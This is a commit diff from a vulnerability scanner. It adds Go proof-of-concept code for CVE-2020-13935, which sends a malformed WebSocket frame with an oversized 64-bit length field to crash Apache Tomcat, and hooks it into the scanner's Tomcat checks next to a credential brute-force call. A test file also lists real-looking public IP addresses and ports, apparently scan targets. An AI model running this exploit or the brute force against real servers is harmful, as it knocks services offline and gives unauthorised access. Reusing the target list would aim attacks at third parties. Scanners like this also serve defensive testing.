add CVE-2020-13935 2022-07-15 09:47:1657849675

imemaker · Jul 15, 2022 · 350a998 · 350a998
1 parent 9139b4a
commit 350a998
Show file tree

Hide file tree

Showing 6 changed files with 81 additions and 26 deletions.
diff --git a/go.mod b/go.mod
@@ -165,6 +165,7 @@ require (
 	github.com/google/go-querystring v1.1.0 // indirect
 	github.com/google/uuid v1.3.0 // indirect
 	github.com/gorilla/css v1.0.0 // indirect
+	github.com/gorilla/websocket v1.5.0 // indirect
 	github.com/gosuri/uilive v0.0.4 // indirect
 	github.com/gosuri/uiprogress v0.0.1 // indirect
 	github.com/h2non/filetype v1.1.3 // indirect

diff --git a/go.sum b/go.sum
@@ -346,6 +346,8 @@ github.com/gopherjs/gopherjs v0.0.0-20181017120253-0766667cb4d1 h1:EGx4pi6eqNxGa
 github.com/gopherjs/gopherjs v0.0.0-20181017120253-0766667cb4d1/go.mod h1:wJfORRmW1u3UXTncJ5qlYoELFm8eSnnEO6hX4iZ3EWY=
 github.com/gorilla/css v1.0.0 h1:BQqNyPTi50JCFMTw/b67hByjMVXZRwGha6wxVGkeihY=
 github.com/gorilla/css v1.0.0/go.mod h1:Dn721qIggHpt4+EFCcTLTU/vk5ySda2ReITrtgBl60c=
+github.com/gorilla/websocket v1.5.0 h1:PPwGk2jz7EePpoHN/+ClbZu8SPxiqlu12wZP/3sWmnc=
+github.com/gorilla/websocket v1.5.0/go.mod h1:YR8l580nyteQvAITg2hZ9XVh4b55+EU/adAjf1fMHhE=
 github.com/gosuri/uilive v0.0.4 h1:hUEBpQDj8D8jXgtCdBu7sWsy5sbW/5GhuO8KBwJ2jyY=
 github.com/gosuri/uilive v0.0.4/go.mod h1:V/epo5LjjlDE5RJUcqx8dbw+zc93y5Ya3yg8tfZ74VI=
 github.com/gosuri/uiprogress v0.0.1 h1:0kpv/XY/qTmFWl/SkaJykZXrBBzwwadmW8fRb7RJSxw=

diff --git a/pocs_go/apache/CVE-2020-13935.go b/pocs_go/apache/CVE-2020-13935.go
@@ -0,0 +1,67 @@
+package apache
+
+import (
+	"bytes"
+	"fmt"
+	"github.com/gorilla/websocket"
+)
+
+func CVE_2020_13935(url string) (bool, error) {
+	ws, _, err := websocket.DefaultDialer.Dial(url, nil)
+	if err != nil {
+		return false, fmt.Errorf("dial: %s", err)
+	}
+
+	// +-+-+-+-+-------+-+-------------+-------------------------------+
+	//  0                   1                   2                   3
+	//  0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+	// +-+-+-+-+-------+-+-------------+-------------------------------+
+	// |F|R|R|R| opcode|M| Payload len |    Extended payload length    |
+	// |I|S|S|S|  (4)  |A|     (7)     |             (16/64)           |
+	// |N|V|V|V|       |S|             |   (if payload len==126/127)   |
+	// | |1|2|3|       |K|             |                               |
+	// +-+-+-+-+-------+-+-------------+ - - - - - - - - - - - - - - - +
+	// |     Extended payload length continued, if payload len == 127  |
+	// + - - - - - - - - - - - - - - - +-------------------------------+
+	// |                               | Masking-key, if MASK set to 1 |
+	// +-------------------------------+-------------------------------+
+	// | Masking-key (continued)       |          Payload Data         |
+	// +-------------------------------- - - - - - - - - - - - - - - - +
+	// :                     Payload Data continued ...                :
+	// + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - +
+	// |                     Payload Data continued ...                |
+	// +---------------------------------------------------------------+
+
+	var buf bytes.Buffer
+
+	fin := 1
+	rsv1 := 0
+	rsv2 := 0
+	rsv3 := 0
+	opcode := websocket.TextMessage
+
+	buf.WriteByte(byte(fin<<7 | rsv1<<6 | rsv2<<5 | rsv3<<4 | opcode))
+
+	// always set the mask bit
+	// indicate 64 bit message length
+	buf.WriteByte(byte(1<<7 | 0b1111111))
+
+	// set msb to 1, violating the spec and triggering the bug
+	buf.Write([]byte{0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF})
+
+	// 4 byte masking key
+	// leave zeros for now, so we do not need to mask
+	maskingKey := []byte{0, 0, 0, 0}
+	buf.Write(maskingKey)
+
+	// write an incomplete message
+	buf.WriteString("test")
+	_, err = ws.UnderlyingConn().Write(buf.Bytes())
+	if err != nil {
+		return false, fmt.Errorf("write: %s", err)
+	}
+	//// keep the websocket connection open for some time
+	//time.Sleep(30 * time.Second)
+
+	return true, nil
+}
diff --git a/pocs_go/go_poc_check.go b/pocs_go/go_poc_check.go
@@ -5,6 +5,7 @@ import (
 	"github.com/hktalent/scan4all/brute"
 	"github.com/hktalent/scan4all/pocs_go/Springboot"
 	"github.com/hktalent/scan4all/pocs_go/ThinkPHP"
+	"github.com/hktalent/scan4all/pocs_go/apache"
 	"github.com/hktalent/scan4all/pocs_go/confluence"
 	"github.com/hktalent/scan4all/pocs_go/f5"
 	"github.com/hktalent/scan4all/pocs_go/fastjson"
@@ -40,15 +41,18 @@ func POCcheck(wappalyzertechnologies []string, URL string, finalURL string, chec
 				technologies = append(technologies, fmt.Sprintf("exp-Shiro|key:%s", key))
 			}
 		case "Apache Tomcat":
+			if ok, _ := apache.CVE_2020_13935(URL); ok {
+				technologies = append(technologies, "exp-Tomcat|CVE-2020-13935")
+			}
 			username, password := brute.Tomcat_brute(URL)
 			if username != "" {
 				technologies = append(technologies, fmt.Sprintf("brute-Tomcat|%s:%s", username, password))
 			}
 			if tomcat.CVE_2020_1938(HOST) {
-				technologies = append(technologies, "exp-Tomcat|CVE_2020_1938")
+				technologies = append(technologies, "exp-Tomcat|CVE-2020-1938")
 			}
 			if tomcat.CVE_2017_12615(URL) {
-				technologies = append(technologies, "exp-Tomcat|CVE_2017_12615")
+				technologies = append(technologies, "exp-Tomcat|CVE-2017-12615")
 			}
 		case "Basic":
 			username, password := brute.Basic_brute(URL)

diff --git a/test/testfg/TestFg2.go b/test/testfg/TestFg2.go
@@ -75,30 +75,8 @@ https://47.104.237.208
 */
 func main() {
 	a := strings.Split(`http://101.132.254.177:8161
-http://101.132.155.38:8161
-http://101.132.34.146:8161
-http://47.108.13.164:8080
-https://13.251.135.159
-http://220.184.147.172:8000
-http://223.78.125.18:8086
-http://59.46.70.114:8091
-http://121.8.249.110:3388
-https://116.236.79.37:9100
-https://61.240.13.104:444
-http://118.195.131.216
-http://117.10.171.174:10010
-http://81.70.143.198:8081
-http://1.119.203.138:8181
-http://1.117.5.50
-http://103.235.238.253
-http://210.12.80.130:8080
-http://47.117.44.62:8087
-http://47.96.141.190
-https://223.111.9.4
-https://115.159.88.218
-http://46.26.46.13
-https://182.92.89.1
-https://47.104.237.208`, "\n")
+http://101.132.155.38:8161/
+http://101.132.34.146:8161`, "\n")
 	if nil == pkg.Cache1 {
 		pkg.NewKvDbOp()
 	}

diff --git a/vendor/modules.txt b/vendor/modules.txt
@@ -292,6 +292,9 @@ github.com/google/uuid
 # github.com/gorilla/css v1.0.0
 ## explicit
 github.com/gorilla/css/scanner
+# github.com/gorilla/websocket v1.5.0
+## explicit; go 1.12
+github.com/gorilla/websocket
 # github.com/gosuri/uilive v0.0.4
 ## explicit; go 1.10
 github.com/gosuri/uilive